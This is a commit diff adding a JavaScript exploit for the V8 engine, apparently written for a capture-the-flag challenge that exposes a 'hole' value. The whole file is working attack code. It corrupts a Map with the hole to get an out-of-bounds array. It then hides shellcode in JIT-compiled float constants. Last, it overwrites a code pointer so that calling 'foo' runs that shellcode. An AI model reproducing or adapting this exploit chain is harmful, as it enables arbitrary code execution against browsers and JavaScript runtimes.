|
| 1 | +// local offsets |
| 2 | +let conversion_buffer = new ArrayBuffer(8); |
| 3 | +let float_view = new Float64Array(conversion_buffer); |
| 4 | +let int_view = new BigUint64Array(conversion_buffer); |
| 5 | +BigInt.prototype.hex = function() { |
| 6 | + return '0x' + this.toString(16); |
| 7 | +}; |
| 8 | +BigInt.prototype.i2f = function() { |
| 9 | + int_view[0] = this; |
| 10 | + return float_view[0]; |
| 11 | +} |
| 12 | + |
| 13 | +Number.prototype.f2i = function() { |
| 14 | + float_view[0] = this; |
| 15 | + return int_view[0]; |
| 16 | +} |
| 17 | + |
| 18 | +Number.prototype.i2f = function() { |
| 19 | + return BigInt(this).i2f(); |
| 20 | +} |
| 21 | + |
| 22 | +function hex(a) { |
| 23 | + return "0x" + a.toString(16); |
| 24 | +} |
| 25 | + |
| 26 | + |
| 27 | + |
| 28 | + |
| 29 | +var map1 = null; |
| 30 | +var foo_arr = null; |
| 31 | +var obj_arr = null; |
| 32 | +var ab = null; |
| 33 | +var foo = null; |
| 34 | +function getmap(){ |
| 35 | + let hole = Array.prototype.hole(); |
| 36 | + |
| 37 | + var map = new Map(); |
| 38 | + var victim = [1.1,1.2,1.3]; |
| 39 | + map.set(1, 1); |
| 40 | + map.set(hole, 1); |
| 41 | + |
| 42 | + map.delete(hole); |
| 43 | + map.delete(hole); |
| 44 | + map.delete(1); |
| 45 | + return map |
| 46 | +} |
| 47 | + |
| 48 | +function gc() { |
| 49 | + for (let i = 0; i < 1; ++i) { |
| 50 | + let buffer = new ArrayBuffer(2 ** 35 - 1).buffer; |
| 51 | + } |
| 52 | +} |
| 53 | +ab = new ArrayBuffer(4); |
| 54 | +nogc = []; |
| 55 | + |
| 56 | +for (let i = 0; i < 1000; i++) { |
| 57 | + map1 = getmap(map1); |
| 58 | + nogc.push(map1); |
| 59 | + |
| 60 | + foo_arr = new Array(1.1, 1.1); |
| 61 | + obj_arr = new Array(0x1337,{}); |
| 62 | + |
| 63 | + nogc.push(foo_arr); |
| 64 | + nogc.push(obj_arr); |
| 65 | + |
| 66 | +} |
| 67 | + |
| 68 | + |
| 69 | +map1.set(0x10, -1); |
| 70 | + |
| 71 | +gc(); |
| 72 | +foo = ()=> |
| 73 | +{ |
| 74 | + return [1.0, |
| 75 | + 1.971182936312695e-246, |
| 76 | + 1.957059683370094e-246, |
| 77 | + 1.9711829275191414e-246, |
| 78 | + 1.971025155563905e-246, |
| 79 | + 1.9711125195806515e-246, |
| 80 | + 1.9710251539303214e-246, |
| 81 | + 1.9711826571398815e-246, |
| 82 | + 1.9710435748055855e-246, |
| 83 | + 1.971025156844263e-246, |
| 84 | + 1.9711832076594195e-246, |
| 85 | + 1.9711823546555445e-246, |
| 86 | + 1.9710251537800814e-246, |
| 87 | + 1.9711829000963798e-246, |
| 88 | + 1.935386242414015e-246, |
| 89 | + 1.9322135955320268e-246, |
| 90 | + 5.547942592569329e-232, |
| 91 | + 5.547942592563475e-232, |
| 92 | + 5.548386605550227e-232, |
| 93 | + 5.497621117806851e-232, |
| 94 | + 5.547942592563292e-232, |
| 95 | + 5.555290044135785e-232, |
| 96 | + 5.547942592582329e-232, |
| 97 | + 5.5479944671360564e-232, |
| 98 | + 5.547942597961432e-232, |
| 99 | + 5.5483866105641465e-232, |
| 100 | + 5.548206933798644e-232, |
| 101 | + 5.5479425977377224e-232, |
| 102 | + 5.548387882601246e-232, |
| 103 | + 5.5483850737849856e-232, |
| 104 | + 5.547942597164718e-232, |
| 105 | + 5.548385878712101e-232, |
| 106 | + 5.548210797194847e-232, |
| 107 | + 5.5479581402263505e-232, |
| 108 | + 1.1]; |
| 109 | +} |
| 110 | + |
| 111 | + |
| 112 | +for (let i = 0; i < 0x10000; i++) { |
| 113 | + foo();foo();foo();foo(); |
| 114 | +} |
| 115 | + |
| 116 | +map1.set(foo_arr, 0xffff); |
| 117 | + |
| 118 | +console.log(foo_arr.length); |
| 119 | + |
| 120 | +var code_index = 100; |
| 121 | +var code_lo_lo = foo_arr[code_index].f2i() & 0xffffffffn; |
| 122 | +var code_lo_hi = foo_arr[code_index].f2i() & 0xffffffff00000000n; |
| 123 | +var sc_ptr = code_lo_hi >> 32n; |
| 124 | +sc_ptr += 0x79n; |
| 125 | +var new_code = (sc_ptr << 32n | code_lo_lo); |
| 126 | +foo_arr[code_index] = new_code.i2f(); |
| 127 | +foo() |
0 commit comments